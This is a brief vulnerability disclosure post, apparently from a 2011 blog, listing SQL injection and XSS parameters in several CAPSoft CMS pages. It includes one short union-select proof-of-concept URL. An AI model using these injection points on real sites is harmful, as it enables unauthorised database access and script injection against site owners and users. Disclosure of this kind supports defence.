Wednesday, March 23, 2011

CAPSoft CMS Multiple Vulnerabilities


Title : CAPSoft CMS Multiple Vulnerabilities
Vendor : http://www.capsoft.com.ar
Found by : p0pc0rn


SQL
---
Vulnerable Parameters are

Method = GET
------------
http://site.com/noticia.asp?id=[SQL]
http://site.com/imprimir.asp?tabla=[content_name]&id=[SQL]
http://site.com/product.asp?intProdID=[SQL]
http://site.com/productosporcategoria.asp?intCatalogID=[SQL]

POC
---
http://site.com/noticia.asp?id=1 union select 0 from test.a

Method = POST
-------------
buscador.asp
ingresar.asp

XSS
---
http://site.com/diseno_web.asp?pcia=[XSS]
http://site.com/productosporcategoria.asp?intCatalogID=[id_number]&strCatalog_NAME=[XSS]


thanks,
-p0pc0rn-
Share:

1 comments:

Thing said...

agregame, dixpoint@gmail.com Bisness :D